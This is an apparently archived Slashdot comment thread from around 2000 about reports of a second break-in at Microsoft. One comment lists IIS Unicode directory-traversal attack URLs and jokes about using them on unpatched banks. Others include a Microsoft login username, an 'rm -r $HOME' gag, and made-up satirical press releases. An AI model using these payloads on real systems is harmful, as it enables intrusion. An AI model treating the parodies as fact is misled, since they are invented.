Microsoft Cracked again? 185
Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld."
They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
Could Microsoft Ask for worse press/marketing? (Score:2)
Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...
Security (Score:1)
They also seem to have a complete disregard for the security of their products, allowing them to be made availiable in this way.
Perhaps Microsoft should actually think about the problems this caused for them, and the problems is could quite easily cause for others, the consequences are most severe.
Buck up your attitude?
Re:M$ Bashing. (Score:1)
Security profile and risk management (Score:1)
They are probably "cracked" on a regular basis, but because you don't hear about it, and so it remains a non-issue. As soon as a little event ends up in the news, this sort of silliness is the result. Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies. One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident. You hear about bank holdups all the time, but you'll never hear about real incidents of electronic fraud or Internet banking attacks, even though they occur every day somewhere on the planet.
There are many companies that take a similar risk-managed approach to security. You classify assets based upon their worth to the organisation, and then you protect them to that value. Cracking into the machines that do "download.microsoft.com" is different to cracking into the corporate ERP system or the internal code repositories.
With over 10,000 attacks a week, Microsoft takes a reasonable approach to security, in my opinion. No one can be 100% secure, and it costs so much to be near 100% secure that it's not worth doing so. If you don't agree with me, bite me. Unlike most of you, risk managed security architecture is what I do for a living.
Re:Microsoft's Servers != Microsoft Windows (Score:1)
Re:Bill Gates... has a conscience? (Score:2)
Too often on here I see the ignoramus posting about the evils of microsoft and Gates. I think its the same thing as penis envy...he's rich, he's got an amazingly successful company..and you dont. I'm no fan of the software quality myself, but I wont go about spouting how the CEO is evil. Thats just immature. I think Gates has proven himself a worthy human with all his donations. At least he's doing more than those other tech people who claim that computers can solve everything. You need to be able to eat decent food and clean water before you need a SystemTech PentiumProThlon 9000 w/ advanced graphics capabilities and altec lansing speakers. You need to solve starvation before planting a laptop in the hands of the poor.
Re:Bill Gates... has a conscience? (Score:1)
Well, by that standard then, nations like Cuba and Iraq ought to be paradises. The embargos keep us vicious foreign devils from looting them. So, why are they miserable pits of desperation and poverty?
As for rule of law, that's very vague. If you mean the laws that allow only US-owned businesses to import and export food while depriving native farmers of implements and supplies, then I'd have to say you're wrong. If you mean establishing a minimum standard of living for the populace, I'd say you're right.
No, I mean that you pass laws that permit people to keep the fruits of their labors and assure certain basic rights such as speech, assembly, voting, etc. and you make sure that you have a legal system that enforces those laws. Without corruption or cronyism.
Your response betrays your mindset that for a nation to succeed, it must obtain the means to do so from outside. I maintain that that simply isn't true. The reason the West prospers is a result of its freedoms, laws, and capitalism. For a good example of what happens when you lose that, you need look no farther than South Africa. Once the economic jewel of the continent, it's gradually descending into a chaos of tribalism and corruption. Unchecked, it will ultimately be as impoverished as its neighbors.
Re:M$ Bashing. (Score:1)
Of course if it was years ago, then most people would lower their guards and relax a bit because they needed a "wake-up-call".
And it cant be easy to be a favorite hacking object.
--------
That's nothing! (Score:2)
That's nothing. I downloaded it, changed some things, and uploaded the changes!
I even put my name in the files, so anyone else who downloads it will know I did it!
Re:Security profile and risk management (Score:2)
"...The[y] triage each attack and deal with those that actually form a real threat to the organisation..."
Even the most self-serving accounts of the previous crack says that the crackers were in for twelve days. M$ spun the story to say that they were watching the whole time; I don't believe that. Now *you* want us to believe that M$'s response team really focuses on attacks "...that actually form a real threat to the organization..."
Nuts. They flat didn't even know the first one was happening for 'way too long.
"...They also conduct internal tiger team attacks to ensure they know about the holes before attackers do..."
That's all real fine-and-dandy for the hard-core threats -- but every account I've read says that M$ was compromised by an email attachment that:
"Tiger teams"?
"Tiger teams" aren't going to do M$ any good; it's their own software and their own arrogance that did them in.
To let you continue:
"...Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies..."
No, I don't, particularily given your outlandish rationalization:
"...One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident..."
"One simple little attack..."?
Hoopla?
That's what any shareholder concern boils down to? God forbid that a company's shares fall in price because they can't manage to implement a comprehensive security system.
And let's not worry the silly little investors about such trivia.
"Hey! They invested in our company. How smart can they be?"
t_t_b
--
I think not; therefore I ain't®
Your subject is your answer (Score:2)
Though, as Microsoft are often in the habit of eating their own dog food, they might beusing their new Internet Security and Acceleration [ISA} Server, the replacement to shitty old proxy server. This eliminates much of the nastiness [and non-firewallness] of PS, and is about -3 months old. This incident would damage the launch severely is MS told anyone what they were using.
I'd suspect, with regards to security, they do the testing in a closed environment for quite some time.
But your point is nevertheless a good one - while we don't know what MS use internally, the habit of people calling Outlook Viruses `email viruses', when they only affect a specific client, is misleading.
Who cares? (Score:2)
Sorry- having an open mind is great so long as your brain doesn't fall out. I think you've been spun. The guy's still the primary personality behind the totally unacceptable behavior of Microsoft, which has been _convicted_ of monopolistic crimes, the list of which is so long it'll make your head spin. Did they just do this at random? No, there was a pattern of 'search and destroy' and open attack of the capitalistic process coming right from the top there.
If tossing a few nickels at charity can really make you forget that, you have a _short_ memory.
Re:Security (Score:1)
Re:Looking at the Source Code is Lethal! (Score:1)
Cracking Microsoft is a bad idea. (Score:5)
So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
oh sure... (Score:1)
b: look at my machine
g: wow, so much cables and so...
b: i am a superhacker. i already hacked pentagon and nearly sent nukes on russians
g: cool really? can you show something to me?
b: sure look now i login to internet
aolsoft: you've got mail
[click click] [ftp://billg:linuxsuxx@microsoft.com]
[rm -r $HOME]
b: now i hacked microsoft!
g: wow, you are my hero *kiss*
Re:Patches and Absolute Certainty (Score:2)
I know that you don't need the source code to find buffer overflows. I also know that of 1000 people who can find a buffer overflow by examining the source code, maybe 2 or 3 know how to use SoftICE or IDA to find the same exploit by working on the binary. So basically, although you are correct in that you don't need the source code, it makes it much more difficult for the average script kiddie to find it, and thus less likely that it will become public knowledge.
Red Flag (Score:1)
Smells terribly fishy to me.
"I don't want the cheese; I only want out of the trap."
Re:Cracking web sites (Score:3)
Bill Gates... has a conscience? (Score:2)
http://www.observer.co.uk/international/story/0,6
This single article reversed 180 degrees my opinion of Mr. Gates.
I previously believed him to be a greedy, naieve, power-hungry egomaniac. If this article is accurate, and he will be giving away his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?
(I know this goes completely against the conventional wisdom on Slashdot, but read the article, maybe submit it as a story here... show that even geeks can be open-minded)
Open Source, Closed Minds. We are Slashdot.
Hmmmm (Score:3)
A
Open Office (Score:1)
Office source code was stolen? Yeah, sure!
Moderator - clue stick! (Score:2)
The moderator who modded the above post as "Troll" must be whacked with a cluestick, please!
Quidquid latine dictum sit, altum viditur.
Re:Bill Gates... has a conscience? (Score:1)
Re:Bill Gates... has a conscience? (Score:2)
After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.
I just had a flashback to the old stories of Siddharta Gautama, who was shielded from death and decay by his royal advisors and parents. Once day upon seeing a sick man, a crippled man, a dead man, and a religious man, he realized how the world really was, and fled to live a religious life.
Wow, I just compared Bill Gates to Buddha. I suddenly feel the need to go wash.
Re:M$ is lucky (Score:1)
Hoax (Score:2)
Bill went home and started calling every Charlie on the phone book to hire angels.
Re:Open Office (Score:1)
The feedback we have gotten from the millions of people who say they are using LINUX has all been positive. Two surprising things are apparent, however, 1) Most of these "users" never bought LINUX (less than 10% of all PC owners have bought LINUX), and 2) The amount of royalties we have received from sales to hobbyists makes the time spent on LINUX worth less than $2 an hour.
Why is this? As the majority of linux users must be aware, most of you steal your software. Hardware must be paid for, but software is something to share. Who cares if the people who worked on it get paid?
Is this fair? One thing you don't do by stealing software is get back at Linus or Alan for some problem you may have had. RedHat doesn't make money selling software. The royalty paid to us, the manual, the tape and the overhead make it a break-even operation. One thing you do do is prevent good software from being written. Who can afford to do professional work for nothing? What hobbyist can put 3-man years into programming, finding all bugs, documenting his product and distribute for free? The fact is, no one besides us has invested a lot of money in hobby software. We have written Emacs, and are writing kernel 2.4, but there is very little incentive to make this software available to hobbyists. Most directly, the thing you do is theft.
Re:Cracking Microsoft is a bad idea. (Score:1)
Re:Bill Gates... has a conscience? (Score:1)
l0phtcrack (Score:2)
Shouldn't l0phtcrack be just as "illegal" regarding Microsoft SAM encrypted password files as DeCSS is to DVDs?
Must have taken lessons from Nvidia (Score:1)
Yhcrana
Patches and Absolute Certainty (Score:4)
This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow virus's to spread have their only fix with these Patches, and that -- according to even Microsoft -- its hard to make sure that the patches our applied completely: we should worry.
One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.
I am asking You All: What ways could we make sure that "patches" had been applied across the board?
Re:Bill Gates... has a conscience? (Score:1)
Cracking web sites (Score:2)
Re:Hmmmm (Score:1)
It was supposed to be funny.
ummm.... (Score:2)
to no good....Hacked twice in a couple of weeks?
Reformat it make make open source! (Score:1)
One can easily see that this code no longer belongs to microsoft since it's "rewritten from stratch"!
there will be a break-in before every new release (Score:3)
________
Re:Bill Gates... has a conscience? (Score:1)
Re:Red Flag (Score:1)
Erm... (Score:1)
Re:Hmmmm (Score:2)
What would he do, upload back to the MS ftp server? Maybe burn it to a disk and mail it to them?
Re:Bill Gates... has a conscience? (Score:1)
It's an improvement, at least. And he's right -- a lot of people would be helped more by basics like immunizations than, oh, Pocket PCs or e-mail.
The NYT almanac puts the life expectancy for those born in '94 in Rwanda at 23; Sierra Leone and Mozambique at 34; Liberia at 39, and so forth. These people have more immediate concerns, like war, famine, pestilence and plague, that should take precedence over hypertext. Funding something like immunizations (which his Foundation does), or, say, GM grains engineered for high yield (dunno if it does), would help a bit more...
Re:Patches and Absolute Certainty (Score:3)
Tivoli for Linux (yes, it exists The Red Hat Update Agent (up2date) (when it works). [tivoli.com]
A clueful admin.
A clueful CIO.
---
Re:M$ is lucky (Score:1)
ETRN x
eBay was running MS (Score:1)
Re:Don't get too proud (Score:2)
--
You think thats it!? (Score:1)
I would still like to see a Boland compiler, being able to download a newer RealPlayer for Linux and being able to feel save of Peter Norotn's Apps. It's not just about being able to see Director in Linux... Flash would be nice. =)
Re:Bill Gates... has a conscience? (Score:1)
we already destory more food than we can eat
food prices are kept artificially high to "stablize economies"
GM crops lock farmers into buy seed grain rather than growing their own and also lock them into pesticide / herbicide models
thus raping Africa once more
Re:Big deal (Score:1)
If you h4x0r3d it, could you please post the 2.4 source code?
We've been waiting for it for soooo long...
</TROLL>
____________________
Re:hacked twice (Score:2)
RT - Russian Technology
--
Well... (Score:1)
But the second bit... well, that's the attitude I sometimes see reading slashdot. I can see how it would be easy for media "outsiders" to make that assumption.
-J
Re:You better not see it... (Score:1)
Now that's scary. I won't object termination of the license agreement, but sending death-squad to the user who peeked into M$ code seems to me a bit like over-reaction...
Re:Could Microsoft Ask for worse press/marketing? (Score:1)
already happened [infoworld.com].
Re:MS Servers (Score:1)
> even though the patches are developed and tested in the same building
.. You forgot to mention the bugs, which are also developed in the same building...
Re:Patches and Absolute Certainty (Score:1)
You could always add them to the payload of an email virus ;)
Re:Which server (Score:4)
And yes, the exploit was nearly identical to one of the lines you mentioned above.
(The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)
h0ax (Score:2)
How high-priority is it? (Score:2)
--
Re:Anyone running anything... (Score:1)
Is it basically because not enough people design software to be secure? Or because people tend to add new features without considering the security ramifications?
Still, I don't see why being hacked is inevitable; at some point, software can be designed so that circumvention involves breaking underlying assumptions which must be true in order for your system to run at all. i.e. any crack would instantly disable your system, leaving it secure.
As a sysadmin, you can't know every single line of every program that's on your system, but isn't this the point of OpenSource: that some people will be intelligent enough to design secure software, and that others can fix what little glitches they miss?
You seem too pessimistic.
You better not see it... (Score:5)
Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.
If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.
We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it
Re:Patches and Absolute Certainty (Score:2)
If you want to wait until someone gets cracked before a hole is patched in your security, go ahread - I'll use open source, thanks.
Re:ummm.... (Score:4)
Monday November 27, 9:00 am Eastern Time
Press Release
Microsoft Eliminates Security Problems related to Linux 'Hacker OS'
Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web breakins that have plagued them, and since eliminated them.
"We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.
Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.
Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."
About Microsoft
Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.
Re:Bill Gates... has a conscience? (Score:1)
But computers could be very useful helping the Third World solve its problems: computers can take much better advantage of limited bandwidth, they are better suited to store-and-forward or intermittent communications, and they can greatly simplify administrative processes and reduce costs. In health care and ecology alone, being able to track diseases and other events reliably is very important.
Of course, for that to work, you need low end, low-cost, reliable, and simple computers, open and stable standards, and free software. Third world countries can gain tremendously from computers, but they won't be able to do so if they spend money as wastefully on frills and upgrades as US corporations seem to be all too willing to do.
Re:Anyone running anything... (Score:2)
--Remove SPAM from my address to mail me
Re:I'm half convinced this whole business is a sha (Score:2)
Shhhhh.... WHAT was that?!? (Score:2)
Microsoft has ties with several people in the government. Good ties. Friendships, so to speak. All of these recent hacker attempts seem a little fishy to me. Why all of the publicity, all of a sudden? Why the big stink?
The USA government wants to pass even more restrictive internet and computer laws... laws which will be passed in the name of security, yet at the same time, killing our necessary personal freedoms - our rights.
Bush and Bill are buddy buddy. Microsoft will hold out on seeing the Supreme Court until Bush has become prez and has appointed new Justices. Microsoft will get a slap on the wrist. Our government will then apply god awful amounts of regulation to the computer industry...
So, yes I am being paranoid, but it all seems so obvious to me. Lets just hope that I am wrong, and next year, I am NOT saying "I told you so."
Re:I'm half convinced this whole business is a sha (Score:2)
Try reading my
Re:h0ax (Score:2)
Poor Microsoft (Score:2)
I'm half convinced this whole business is a sham (Score:2)
Expect to see legal roadblocks in the future for wine.
Lee
UCITA (Score:2)
Now that would be scary.
I bet the politicians behind UCITA didn't think of that.
Microsoft's Servers != Microsoft Windows (Score:5)
-------
Not True (Score:2)
Microsoft's internal network is made up of many seperate domains (and Active Directory forests). The Houston domain used exclusively for Microsoft's online properties (MSN.com, Microsoft.com, etc...) and has no privledges to Microsoft's primary domain, REDMOND.
BTW: You can PPTP into Microsoft at cxn-redmond.microsoft.com. (However, they took it down recently because of these security problems.) Username: REDMOND\billg; Password: ????
Re:Bill Gates... has a conscience? (Score:2)
> his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe
> slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?
For the last souple of years (perhaps under the influence of this wife Malinda, perhaps not), Gates has been throwing money at various philanthropic targets. We're talking serious stuff like money to help homeless youth in the US Northwest, or to fund school programs in low-income school districts.
Does this mean he has gained a conscience? No, he's always demonstrated signs that his political views are left of center; it's something of a hold-over form growing in up in Seattle. I'd say his own political views are best described as a ``limousine liberal." He is eager to throw money as ``good" causes, but has never thought about how much money he made by causing problems that need to be addressed by those ``good" causes. He is eager to give millions to provide drugs for Africa, but does not understand that Africa does not have the money to buy computer software at $50-- a pop. (MS Office being extra.)
Have no fear: Billg is still the ``greedy, naive power-hungry egomaniac" we all know & love. And he's got a ring of folks around him who will do theri utmost to keep him that way. They check his computer daily to make sure he'll never see a BSOD, & assure him that he is the genius he thinks he is.
After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.
Geoff
In other news... (Score:5)
President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.
Jeff
Re:*yawn* troll (Score:2)
MS has no incentive in the marketplace to improve their software. Maybe bringing it home to them, by showing them how bad their security is, will force them to make a better product. I doubt it though.
I worked in a bike shop for a few years. One man kept bringing in his bike to repair flats. He had about ten patches on his tires. It would have been cheaper to buy a heavy-duty inner tube and thorn scrapers, than to have it repaired over and over again, but he kept that leaky old inner tube.
Re:I'm half convinced this whole business is a sha (Score:2)
I don't know about you, but I really don't care whether my word processor is freeware or commercial. I want the underlying operating system to be free, or at least have all its specs published in full. Linux is great not so much because it is free of charge, but because there aren't any secrets about it. With windows there are lots of secrets. With the MacOS there are even more. But with Linux everything is right there on the table and its got a complete development environment included to boot! Talk about a hackers (!cracker) dream come true!
In short, the open source/free software model is one that works in some areas. It does not work for all. Therefore it is not going to take over the world. Twenty years from now commercial software will be just as prevalent as it is right now, if not more prevalent. There is every chance that free software might not be successful in the long run. There is also every chance that it will be successful. But there is nearly zero chance that it will overtake every other development model.
I personally think wine is the greatest thing since Linux itself. Imagine a terminal server type system based off wine? M$'s own terminal server is severly limited by the poor multi-user performance of NT. Unlike Linux and virtually any other version of Unix, it is very easy for a single user to eat up all the resources and lock out everyone else. This is a serious problem, but one that wine does not share. It wouldn't be too hard to make wine into one kick ass terminal server
I'm looking forward to bigger and better things from wine.
Lee
eBay runs IIS :-( (Score:2)
The reason is that they find it easier to do rapid application development on the Windows machines. So in theory they can keep their back-end solid via Unix while having the development tools on an easily mastered platform.
Personally, I think running the whole thing on Solaris would have been easier, but that is/was their rationale.
D
----
Re:Microsoft's Servers != Microsoft Windows (Score:2)
D
----
Re:Bill Gates... has a conscience? (Score:2)
Turn off your computer, go outside, take a long pleasent walk, contemplate, and don't log back in till you realise there is more to the world then 1's and 0's.
Third world countries need food, water, shelter and peace NOT computers. Regardless, this is getting way off topic, would really like to see that article posted in it's own thread. Would be interesting to see if the /. crowd is as open minded as it thinks it is.
Don't get too proud (Score:3)
In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure"
First thing I do after installing any Os is find any security info I can and apply the related fixes.
Re:Bill Gates... has a conscience? (Score:2)
Re:Cracking web sites (Score:2)
Besides that, the highest profile linux sites aren't anywhere near as popular or hated as microsofts sites. IF linux made more enemies, i'm sure we'd see more concerted eforts to break it. Of course we'd get patches within hours days or weeks of each exploit. But the point is, because microsoft is almost so universally disliked by hackers, they go out of their way breaking microsofts products, rather than expend that same effort on free software.
Re:You better not see it... (Score:2)
* Termination.
Without prejudice to any other rights, Microsoft may terminate this EULA if you fail to comply with the terms and conditions of this EULA. In such event, you must destroy all copies of the SOFTWARE PRODUCT and all of its component parts.
Sounds fun. [aol.com]
--
The real impact of this (Score:2)
Which server (Score:5)
He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.
http://target/scripts/..%c1%1c../winnt/system32
http://target/scripts/..%c0%9v../winnt/system32
http://target/scripts/..%c0%af../winnt/system32
http://target/scripts/..%c0%qf../winnt/system32
http://target/scripts/..%c1%8s../winnt/system32
http://target/scripts/..%c1%9c../winnt/system32
http://target/scripts/..%c1%pc../winnt/system32
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
MS Windows - a toy Operating System (Score:3)
Re:Anyone running anything... (Score:2)
That's not quite true, though. One additional, and very important, thing that you can do is to try to figure out how to minimize the damage that an attacker can do even if he does manage to crack something. This is an area in which Unix/Linux and NT both fall down pretty badly; they spend a lot of time trying to make it hard to get priviledge, but let you do pretty much anything you want if you do. There needs to be a lot more attention paid to making systems damage tolerant, so that a broken ftpd (or whatever) won't put the whole system at risk.
Re:Bill Gates... has a conscience? (Score:2)
BillG has made most of his money from ripping off large, wealthy Western companies and large, wealthy Westerners. While ripping people off is always unethical, the cynical side of me says that if a large proportion of Bill Gates' wealth earned, by and large, from rich people, ends up going to people who really need it, that goes some way to squaring the ledger :)
Guess I'm not an 31337 h4x0r after all. (Score:3)
The first thing I tried was the cmd.exe
Then I pcanywhered in and decided to see if I remote launched notepad if it would appear on the display. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except task manager. Can't even launch the services panel to kill IIS.
So now I'm attempting the tried and true method of fixing a win box.
Anyone running anything... (Score:2)
Connect your computer to the internet. Allow it to accept any connection of any sort, ever, from anyone.
Congratulations. You're now at risk of being cracked.
All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.
You're still going to get cracked one day, if enough people try, and enough people care. System administration is more about making this cracking difficult to the point of it not being worth it, rather than ruling it out altogether.
--Remove SPAM from my address to mail me
Script-kiddies and car-thieves (Score:4)
You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intrincacies of software they would not be script-kiddies.
Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.
Re:Patches and Absolute Certainty (Score:2)
On the other hand, you don't need to pinpoint a weakness in the source code to break a software, you just overload it and see how it reacts. A chain is as weak as its weakest link, pull it with enough force and it will break.
Determining the exact point of the failure is a work for the programmers who wrote the code, the crackers don't need to do that.
M$ Bashing. (Score:3)
Now for mine. A company that size with so many users depending on them, have a huge reasonability in keeping this from not happening. When it happened the first time, they should have the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual, can we go past 500.
[extreme bashing on]If they cant secure their own network based on their own products who can.[extreme bashing off]. ah felt good.
But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
--------
Big deal (Score:4)
MS Servers (Score:5)
1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.
Did I miss anything?
Re:Bill Gates... has a conscience? (Score:2)
Naw, just remember the old Zen koan:
``If you meet the Buddha on the road, KILL HIM!"
(Note to the humor impared & windows-lovers out there: yes, I *am* making a joke.)
Geoff
Re:Look a little closer to home than that (Score:2)
Err, I don't think that my words implied that Billg was an example of ``unadulterated altruism". If being a limousine liberal was identical to pure unadulterated altruism, then we'd be giving Sally Struthers, spokeswoman for the ``Save the Children" foundation the Nobel Peace Prize, rather than Mother Teresa.
Then again, even if ``a lot of the donating that he does comes with the proviso that his name is loudly involved, I'll admit for sake of fairness that it's more than some of his peers are doing. Will we ever see the ``Larry Ellison Home for Battered Women"? Or even an ``Andrew Grove Foundation for Judaic Studies"?
So far, all I've seen created is Paul Allen's temple to Jimi Hendrix, & I'm still not convinced that even that is a good thing.
Geoff